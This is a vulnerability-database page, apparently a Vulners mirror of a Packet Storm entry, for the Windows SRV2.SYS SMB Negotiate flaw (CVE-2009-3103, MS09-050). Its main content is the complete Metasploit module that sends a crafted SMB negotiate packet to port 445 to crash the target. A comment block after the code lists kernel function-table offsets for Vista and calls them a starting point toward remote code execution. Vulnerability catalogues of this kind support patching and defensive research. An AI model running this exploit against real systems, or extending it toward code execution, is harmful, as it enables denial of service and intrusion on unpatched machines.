Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

🗓️ 31 Aug 2024 00:00:00Reported by H D Moore, laurent gaffie, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 349 Views

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference. Exploits SMB request validation code of SRV2.SYS driver in Windows Vista, Windows 7, and Windows 2008 Server

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) Exploit
26 Feb 201600:00
zdt
GithubExploit		Exploit for CVE-2009-3103
26 Jan 202607:13
githubexploit
Circl		CVE-2009-3103
9 Sep 200900:00
circl
Check Point Advisories		Microsoft Windows Server Remote Code Execution (CVE-2009-3103)
30 May 202100:00
checkpoint_advisories
Check Point Advisories		Microsoft Windows SMB Negotiate Request Remote Code Execution (CVE-2009-2532; CVE-2009-3103)
9 Sep 200900:00
checkpoint_advisories
CVE		CVE-2009-3103
8 Sep 200922:00
cve
Cvelist		CVE-2009-3103
8 Sep 200922:00
cvelist
Exploit DB		Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
3 Jul 201000:00
exploitdb
Metasploit		Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
15 Apr 201016:08
metasploit
Metasploit		Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
15 Apr 201016:08
metasploit
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',  
'Description' => %q{  
This module exploits an out of bounds function table dereference in the SMB  
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7  
release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista  
without SP1 does not seem affected by this flaw.  
},  
  
'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2009-3103'],  
['BID', '36299'],  
['OSVDB', '57799'],  
['MSB', 'MS09-050'],  
['URL', 'https://seclists.org/fulldisclosure/2009/Sep/39']  
]  
))  
register_options([  
Opt::RPORT(445),  
OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])  
])  
  
end  
  
  
def run  
connect()  
  
# The SMB 2 dialect must be there  
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']  
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')  
  
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct  
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE  
pkt['Payload']['SMB'].v['Flags1'] = 0x18  
pkt['Payload']['SMB'].v['Flags2'] = 0xc853  
pkt['Payload'].v['Payload'] = data  
  
pkt['Payload']['SMB'].v['ProcessIDHigh'] = datastore['OFFSET'].to_i  
pkt['Payload']['SMB'].v['ProcessID'] = 0  
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)  
  
print_status("Sending request and waiting for a reply...")  
sock.put(pkt.to_s)  
r = sock.get_once  
  
if(not r)  
print_status("The target system has likely crashed")  
else  
print_status("Response received: #{r.inspect}")  
end  
  
disconnect()  
end  
end  
  
=begin  
  
Gaining code execution means pointing the offset to something that  
eventually causes us to run arbitrary code. The offsets below are  
a starting point for turning this into remote code execution.  
  
Offsets on Vista SP1 x64:  
0x1B = "SMB 2.002"  
0x1D = L"SMB2Validate"  
0x1E = L"SMB2Execute"  
0x31 = move eax, 0x00000002 + ret # causes a hang when reaced  
0x58 = WmiQueryTraceInformation  
0x59 = WmiTraceMessage  
0x66 = ExAllocatePoolWithTag  
0x67 = ExFreePool  
0x76 = ExAllocatePoolWithTag  
0x77 = ExFreePool  
0x86 = ExAllocatePoolWithTag  
0x87 = ExFreePoo  
0x96 = ExAllocatePoolWithTag  
0x97 = ExFreePoo  
0xa6 = ExAllocatePoolWithTag  
0xa7 = ExFreePoo  
0xb9 = BugCheckEx  
0xc7 = SrvBalanceCredits  
0xdf = SrvNetStatistics data  
0xe0 = SrvNetStatisticsLock  
0x010e = SrvSnapShotScaevengerThread  
0x011c = SrvSnapShotScavengerTimer  
0x012a = SrvScavengerThread  
0x0138 = SrvScavengerTimer  
0x0146 = SrvScavengeDurableHandles  
0x0157 = SrvScavengeDurableHandlesTimer  
0x0166 = SrvProcessOplockBreaks  
0x0179 = SrvProcessOplockBreakTimer  
0x0185 = L"XactSrv"  
0x01f8 = WppTraceCallback  
  
  
Offsets on Vista SP1 (no updates) x86:  
  
0x64 = mov esp, ebp; pop ebp, ret  
0xde = pool with tag  
  
0 -> 99b51d6e - 8bff558bec5153568b75088b46308b98  
1 -> 99b55967 - 8bff558bec51518b45088b48308b8958  
2 -> 99b53e19 - 8bff558bec568b75088b4e7083791444  
3 -> 99b55811 - 8bff558bec5151538b5d088b43708378  
4 -> 99b53d54 - 8bff558bec56578b7d088b4770837814  
5 -> 99b54d41 - 8bff558bec83ec145356578b7d088b47  
6 -> 99b54c81 - 8bff558bec518b4d088b816c01000053  
7 -> 99b66c44 - 8bff558bec518b4d088b816c01000053  
8 -> 99b655bf - 8bff558bec518b55088b427083781471  
9 -> 99b63ce4 - 8bff558bec518b4d088b816c01000053  
10 -> 99b5a221 - 8bff558bec518b4d088b816c01000053  
11 -> 99b62996 - 8bff558bec518b4d088b816c01000053  
12 -> 99b5fab5 - 8bff558bec518b4d088b816c01000053  
25 -> 819aca26 - 6a2468d0988981e8960beeff33d28955  
26 -> 8186c78b - 8bff558bec83e4f86a008d451c50ff75  
62 -> 80d40f20 - 0000000000eb45000000000000000000  
116 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b  
117 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d  
166 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b  
167 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d  
194 -> 99b6b74c - 8bff558bec83ec0c0fb64d088b451c53  
195 -> 99b683f0 - 943018c0c6fd3f49a3e8697224f83f6f  
206 -> 99b5eeb5 - 8bff558bec83ec1ca11094b69953568b  
217 -> 99b5eea0 - 6a0168809ab699ff151880b699c21000  
226 -> 99b5211d - 8bff558bec83ec145356578d45f450c6  
231 -> 8192fcd0 - 0000000014fd9281ffffffff04000000  
237 -> 99b52108 - 6a0168009bb699ff151880b699c21000  
382 -> 8b137500 - 000000009075138b0000000000000000  
491 -> 8599b680 - 894518e82ee2ffff3b45087341ff7520  
646 -> c000009a - 0000ffffffff80040000ffffffff8004  
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe  
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c  
804 -> 830ffc7d - 0000001722268b3e012004020010c01c  
  
  
=end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 210
EPSS0.92861
microsoftsrv2.syssmbnegotiatewindows vistawindows 7windows 2008 serverexploitremote code executionvulnerabilityfunction table
349